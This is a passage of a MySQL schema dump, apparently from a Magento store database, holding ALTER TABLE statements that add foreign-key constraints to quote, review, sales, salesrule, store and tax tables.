-- Constraints for table `queue_message_status`
--
ALTER TABLE `queue_message_status`
  ADD CONSTRAINT `QUEUE_MESSAGE_STATUS_MESSAGE_ID_QUEUE_MESSAGE_ID` FOREIGN KEY (`message_id`) REFERENCES `queue_message` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `QUEUE_MESSAGE_STATUS_QUEUE_ID_QUEUE_ID` FOREIGN KEY (`queue_id`) REFERENCES `queue` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `quote`
--
ALTER TABLE `quote`
  ADD CONSTRAINT `QUOTE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `quote_address`
--
ALTER TABLE `quote_address`
  ADD CONSTRAINT `QUOTE_ADDRESS_QUOTE_ID_QUOTE_ENTITY_ID` FOREIGN KEY (`quote_id`) REFERENCES `quote` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `quote_address_item`
--
ALTER TABLE `quote_address_item`
  ADD CONSTRAINT `QUOTE_ADDRESS_ITEM_QUOTE_ADDRESS_ID_QUOTE_ADDRESS_ADDRESS_ID` FOREIGN KEY (`quote_address_id`) REFERENCES `quote_address` (`address_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `QUOTE_ADDRESS_ITEM_QUOTE_ITEM_ID_QUOTE_ITEM_ITEM_ID` FOREIGN KEY (`quote_item_id`) REFERENCES `quote_item` (`item_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `QUOTE_ADDR_ITEM_PARENT_ITEM_ID_QUOTE_ADDR_ITEM_ADDR_ITEM_ID` FOREIGN KEY (`parent_item_id`) REFERENCES `quote_address_item` (`address_item_id`) ON DELETE CASCADE;

--
-- Constraints for table `quote_id_mask`
--
ALTER TABLE `quote_id_mask`
  ADD CONSTRAINT `QUOTE_ID_MASK_QUOTE_ID_QUOTE_ENTITY_ID` FOREIGN KEY (`quote_id`) REFERENCES `quote` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `quote_item`
--
ALTER TABLE `quote_item`
  ADD CONSTRAINT `QUOTE_ITEM_PARENT_ITEM_ID_QUOTE_ITEM_ITEM_ID` FOREIGN KEY (`parent_item_id`) REFERENCES `quote_item` (`item_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `QUOTE_ITEM_QUOTE_ID_QUOTE_ENTITY_ID` FOREIGN KEY (`quote_id`) REFERENCES `quote` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `QUOTE_ITEM_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `quote_item_option`
--
ALTER TABLE `quote_item_option`
  ADD CONSTRAINT `QUOTE_ITEM_OPTION_ITEM_ID_QUOTE_ITEM_ITEM_ID` FOREIGN KEY (`item_id`) REFERENCES `quote_item` (`item_id`) ON DELETE CASCADE;

--
-- Constraints for table `quote_payment`
--
ALTER TABLE `quote_payment`
  ADD CONSTRAINT `QUOTE_PAYMENT_QUOTE_ID_QUOTE_ENTITY_ID` FOREIGN KEY (`quote_id`) REFERENCES `quote` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `quote_shipping_rate`
--
ALTER TABLE `quote_shipping_rate`
  ADD CONSTRAINT `QUOTE_SHIPPING_RATE_ADDRESS_ID_QUOTE_ADDRESS_ADDRESS_ID` FOREIGN KEY (`address_id`) REFERENCES `quote_address` (`address_id`) ON DELETE CASCADE;

--
-- Constraints for table `rating`
--
ALTER TABLE `rating`
  ADD CONSTRAINT `RATING_ENTITY_ID_RATING_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `rating_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `rating_option`
--
ALTER TABLE `rating_option`
  ADD CONSTRAINT `RATING_OPTION_RATING_ID_RATING_RATING_ID` FOREIGN KEY (`rating_id`) REFERENCES `rating` (`rating_id`) ON DELETE CASCADE;

--
-- Constraints for table `rating_option_vote`
--
ALTER TABLE `rating_option_vote`
  ADD CONSTRAINT `RATING_OPTION_VOTE_OPTION_ID_RATING_OPTION_OPTION_ID` FOREIGN KEY (`option_id`) REFERENCES `rating_option` (`option_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `RATING_OPTION_VOTE_REVIEW_ID_REVIEW_REVIEW_ID` FOREIGN KEY (`review_id`) REFERENCES `review` (`review_id`) ON DELETE CASCADE;

--
-- Constraints for table `rating_option_vote_aggregated`
--
ALTER TABLE `rating_option_vote_aggregated`
  ADD CONSTRAINT `RATING_OPTION_VOTE_AGGREGATED_RATING_ID_RATING_RATING_ID` FOREIGN KEY (`rating_id`) REFERENCES `rating` (`rating_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `RATING_OPTION_VOTE_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `rating_store`
--
ALTER TABLE `rating_store`
  ADD CONSTRAINT `RATING_STORE_RATING_ID_RATING_RATING_ID` FOREIGN KEY (`rating_id`) REFERENCES `rating` (`rating_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `RATING_STORE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `rating_title`
--
ALTER TABLE `rating_title`
  ADD CONSTRAINT `RATING_TITLE_RATING_ID_RATING_RATING_ID` FOREIGN KEY (`rating_id`) REFERENCES `rating` (`rating_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `RATING_TITLE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `release_notification_viewer_log`
--
ALTER TABLE `release_notification_viewer_log`
  ADD CONSTRAINT `RELEASE_NOTIFICATION_VIEWER_LOG_VIEWER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`viewer_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `report_compared_product_index`
--
ALTER TABLE `report_compared_product_index`
  ADD CONSTRAINT `REPORT_CMPD_PRD_IDX_CSTR_ID_CSTR_ENTT_ENTT_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_CMPD_PRD_IDX_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_COMPARED_PRODUCT_INDEX_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `report_event`
--
ALTER TABLE `report_event`
  ADD CONSTRAINT `REPORT_EVENT_EVENT_TYPE_ID_REPORT_EVENT_TYPES_EVENT_TYPE_ID` FOREIGN KEY (`event_type_id`) REFERENCES `report_event_types` (`event_type_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_EVENT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `report_viewed_product_aggregated_daily`
--
ALTER TABLE `report_viewed_product_aggregated_daily`
  ADD CONSTRAINT `REPORT_VIEWED_PRD_AGGRED_DAILY_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_VIEWED_PRODUCT_AGGREGATED_DAILY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `report_viewed_product_aggregated_monthly`
--
ALTER TABLE `report_viewed_product_aggregated_monthly`
  ADD CONSTRAINT `REPORT_VIEWED_PRD_AGGRED_MONTHLY_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_VIEWED_PRODUCT_AGGREGATED_MONTHLY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `report_viewed_product_aggregated_yearly`
--
ALTER TABLE `report_viewed_product_aggregated_yearly`
  ADD CONSTRAINT `REPORT_VIEWED_PRD_AGGRED_YEARLY_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_VIEWED_PRODUCT_AGGREGATED_YEARLY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `report_viewed_product_index`
--
ALTER TABLE `report_viewed_product_index`
  ADD CONSTRAINT `REPORT_VIEWED_PRD_IDX_CSTR_ID_CSTR_ENTT_ENTT_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_VIEWED_PRD_IDX_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REPORT_VIEWED_PRODUCT_INDEX_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `review`
--
ALTER TABLE `review`
  ADD CONSTRAINT `REVIEW_ENTITY_ID_REVIEW_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `review_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REVIEW_STATUS_ID_REVIEW_STATUS_STATUS_ID` FOREIGN KEY (`status_id`) REFERENCES `review_status` (`status_id`) ON DELETE NO ACTION;

--
-- Constraints for table `review_detail`
--
ALTER TABLE `review_detail`
  ADD CONSTRAINT `REVIEW_DETAIL_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `REVIEW_DETAIL_REVIEW_ID_REVIEW_REVIEW_ID` FOREIGN KEY (`review_id`) REFERENCES `review` (`review_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REVIEW_DETAIL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `review_entity_summary`
--
ALTER TABLE `review_entity_summary`
  ADD CONSTRAINT `REVIEW_ENTITY_SUMMARY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `review_store`
--
ALTER TABLE `review_store`
  ADD CONSTRAINT `REVIEW_STORE_REVIEW_ID_REVIEW_REVIEW_ID` FOREIGN KEY (`review_id`) REFERENCES `review` (`review_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `REVIEW_STORE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_coupon`
--
ALTER TABLE `salesrule_coupon`
  ADD CONSTRAINT `SALESRULE_COUPON_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_coupon_aggregated`
--
ALTER TABLE `salesrule_coupon_aggregated`
  ADD CONSTRAINT `SALESRULE_COUPON_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_coupon_aggregated_order`
--
ALTER TABLE `salesrule_coupon_aggregated_order`
  ADD CONSTRAINT `SALESRULE_COUPON_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_coupon_aggregated_updated`
--
ALTER TABLE `salesrule_coupon_aggregated_updated`
  ADD CONSTRAINT `SALESRULE_COUPON_AGGREGATED_UPDATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_coupon_usage`
--
ALTER TABLE `salesrule_coupon_usage`
  ADD CONSTRAINT `SALESRULE_COUPON_USAGE_COUPON_ID_SALESRULE_COUPON_COUPON_ID` FOREIGN KEY (`coupon_id`) REFERENCES `salesrule_coupon` (`coupon_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_COUPON_USAGE_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_customer`
--
ALTER TABLE `salesrule_customer`
  ADD CONSTRAINT `SALESRULE_CUSTOMER_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_CUSTOMER_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_customer_group`
--
ALTER TABLE `salesrule_customer_group`
  ADD CONSTRAINT `SALESRULE_CSTR_GROUP_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_CUSTOMER_GROUP_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_label`
--
ALTER TABLE `salesrule_label`
  ADD CONSTRAINT `SALESRULE_LABEL_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_product_attribute`
--
ALTER TABLE `salesrule_product_attribute`
  ADD CONSTRAINT `SALESRULE_PRD_ATTR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_PRD_ATTR_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_PRODUCT_ATTRIBUTE_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_PRODUCT_ATTRIBUTE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `salesrule_website`
--
ALTER TABLE `salesrule_website`
  ADD CONSTRAINT `SALESRULE_WEBSITE_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALESRULE_WEBSITE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_bestsellers_aggregated_daily`
--
ALTER TABLE `sales_bestsellers_aggregated_daily`
  ADD CONSTRAINT `SALES_BESTSELLERS_AGGREGATED_DAILY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_bestsellers_aggregated_monthly`
--
ALTER TABLE `sales_bestsellers_aggregated_monthly`
  ADD CONSTRAINT `SALES_BESTSELLERS_AGGREGATED_MONTHLY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_bestsellers_aggregated_yearly`
--
ALTER TABLE `sales_bestsellers_aggregated_yearly`
  ADD CONSTRAINT `SALES_BESTSELLERS_AGGREGATED_YEARLY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_creditmemo`
--
ALTER TABLE `sales_creditmemo`
  ADD CONSTRAINT `SALES_CREDITMEMO_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_CREDITMEMO_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_creditmemo_comment`
--
ALTER TABLE `sales_creditmemo_comment`
  ADD CONSTRAINT `SALES_CREDITMEMO_COMMENT_PARENT_ID_SALES_CREDITMEMO_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_creditmemo` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_creditmemo_item`
--
ALTER TABLE `sales_creditmemo_item`
  ADD CONSTRAINT `SALES_CREDITMEMO_ITEM_PARENT_ID_SALES_CREDITMEMO_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_creditmemo` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_invoice`
--
ALTER TABLE `sales_invoice`
  ADD CONSTRAINT `SALES_INVOICE_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_INVOICE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_invoiced_aggregated`
--
ALTER TABLE `sales_invoiced_aggregated`
  ADD CONSTRAINT `SALES_INVOICED_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_invoiced_aggregated_order`
--
ALTER TABLE `sales_invoiced_aggregated_order`
  ADD CONSTRAINT `SALES_INVOICED_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_invoice_comment`
--
ALTER TABLE `sales_invoice_comment`
  ADD CONSTRAINT `SALES_INVOICE_COMMENT_PARENT_ID_SALES_INVOICE_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_invoice` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_invoice_item`
--
ALTER TABLE `sales_invoice_item`
  ADD CONSTRAINT `SALES_INVOICE_ITEM_PARENT_ID_SALES_INVOICE_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_invoice` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_order`
--
ALTER TABLE `sales_order`
  ADD CONSTRAINT `SALES_ORDER_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `SALES_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_order_address`
--
ALTER TABLE `sales_order_address`
  ADD CONSTRAINT `SALES_ORDER_ADDRESS_PARENT_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_order_aggregated_created`
--
ALTER TABLE `sales_order_aggregated_created`
  ADD CONSTRAINT `SALES_ORDER_AGGREGATED_CREATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_order_aggregated_updated`
--
ALTER TABLE `sales_order_aggregated_updated`
  ADD CONSTRAINT `SALES_ORDER_AGGREGATED_UPDATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_order_item`
--
ALTER TABLE `sales_order_item`
  ADD CONSTRAINT `SALES_ORDER_ITEM_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_ORDER_ITEM_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_order_payment`
--
ALTER TABLE `sales_order_payment`
  ADD CONSTRAINT `SALES_ORDER_PAYMENT_PARENT_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_order_status_history`
--
ALTER TABLE `sales_order_status_history`
  ADD CONSTRAINT `SALES_ORDER_STATUS_HISTORY_PARENT_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_order_status_label`
--
ALTER TABLE `sales_order_status_label`
  ADD CONSTRAINT `SALES_ORDER_STATUS_LABEL_STATUS_SALES_ORDER_STATUS_STATUS` FOREIGN KEY (`status`) REFERENCES `sales_order_status` (`status`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_ORDER_STATUS_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_order_status_state`
--
ALTER TABLE `sales_order_status_state`
  ADD CONSTRAINT `SALES_ORDER_STATUS_STATE_STATUS_SALES_ORDER_STATUS_STATUS` FOREIGN KEY (`status`) REFERENCES `sales_order_status` (`status`) ON DELETE CASCADE;

--
-- Constraints for table `sales_order_tax_item`
--
ALTER TABLE `sales_order_tax_item`
  ADD CONSTRAINT `SALES_ORDER_TAX_ITEM_ASSOCIATED_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` FOREIGN KEY (`associated_item_id`) REFERENCES `sales_order_item` (`item_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_ORDER_TAX_ITEM_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` FOREIGN KEY (`item_id`) REFERENCES `sales_order_item` (`item_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_ORDER_TAX_ITEM_TAX_ID_SALES_ORDER_TAX_TAX_ID` FOREIGN KEY (`tax_id`) REFERENCES `sales_order_tax` (`tax_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_payment_transaction`
--
ALTER TABLE `sales_payment_transaction`
  ADD CONSTRAINT `FK_B99FF1A06402D725EBDB0F3A7ECD47A2` FOREIGN KEY (`parent_id`) REFERENCES `sales_payment_transaction` (`transaction_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_PAYMENT_TRANSACTION_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_PAYMENT_TRANSACTION_PAYMENT_ID_SALES_ORDER_PAYMENT_ENTT_ID` FOREIGN KEY (`payment_id`) REFERENCES `sales_order_payment` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_refunded_aggregated`
--
ALTER TABLE `sales_refunded_aggregated`
  ADD CONSTRAINT `SALES_REFUNDED_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_refunded_aggregated_order`
--
ALTER TABLE `sales_refunded_aggregated_order`
  ADD CONSTRAINT `SALES_REFUNDED_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_sequence_profile`
--
ALTER TABLE `sales_sequence_profile`
  ADD CONSTRAINT `SALES_SEQUENCE_PROFILE_META_ID_SALES_SEQUENCE_META_META_ID` FOREIGN KEY (`meta_id`) REFERENCES `sales_sequence_meta` (`meta_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_shipment`
--
ALTER TABLE `sales_shipment`
  ADD CONSTRAINT `SALES_SHIPMENT_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SALES_SHIPMENT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_shipment_comment`
--
ALTER TABLE `sales_shipment_comment`
  ADD CONSTRAINT `SALES_SHIPMENT_COMMENT_PARENT_ID_SALES_SHIPMENT_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_shipment` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_shipment_item`
--
ALTER TABLE `sales_shipment_item`
  ADD CONSTRAINT `SALES_SHIPMENT_ITEM_PARENT_ID_SALES_SHIPMENT_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_shipment` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_shipment_track`
--
ALTER TABLE `sales_shipment_track`
  ADD CONSTRAINT `SALES_SHIPMENT_TRACK_PARENT_ID_SALES_SHIPMENT_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_shipment` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `sales_shipping_aggregated`
--
ALTER TABLE `sales_shipping_aggregated`
  ADD CONSTRAINT `SALES_SHIPPING_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `sales_shipping_aggregated_order`
--
ALTER TABLE `sales_shipping_aggregated_order`
  ADD CONSTRAINT `SALES_SHIPPING_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `search_query`
--
ALTER TABLE `search_query`
  ADD CONSTRAINT `SEARCH_QUERY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `search_synonyms`
--
ALTER TABLE `search_synonyms`
  ADD CONSTRAINT `SEARCH_SYNONYMS_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `SEARCH_SYNONYMS_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `signifyd_case`
--
ALTER TABLE `signifyd_case`
  ADD CONSTRAINT `SIGNIFYD_CASE_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE SET NULL;

--
-- Constraints for table `sitemap`
--
ALTER TABLE `sitemap`
  ADD CONSTRAINT `SITEMAP_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `store`
--
ALTER TABLE `store`
  ADD CONSTRAINT `STORE_GROUP_ID_STORE_GROUP_GROUP_ID` FOREIGN KEY (`group_id`) REFERENCES `store_group` (`group_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `STORE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `store_group`
--
ALTER TABLE `store_group`
  ADD CONSTRAINT `STORE_GROUP_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `tax_calculation`
--
ALTER TABLE `tax_calculation`
  ADD CONSTRAINT `TAX_CALCULATION_CUSTOMER_TAX_CLASS_ID_TAX_CLASS_CLASS_ID` FOREIGN KEY (`customer_tax_class_id`) REFERENCES `tax_class` (`class_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `TAX_CALCULATION_PRODUCT_TAX_CLASS_ID_TAX_CLASS_CLASS_ID` FOREIGN KEY (`product_tax_class_id`) REFERENCES `tax_class` (`class_id`) ON DELETE CASCADE,
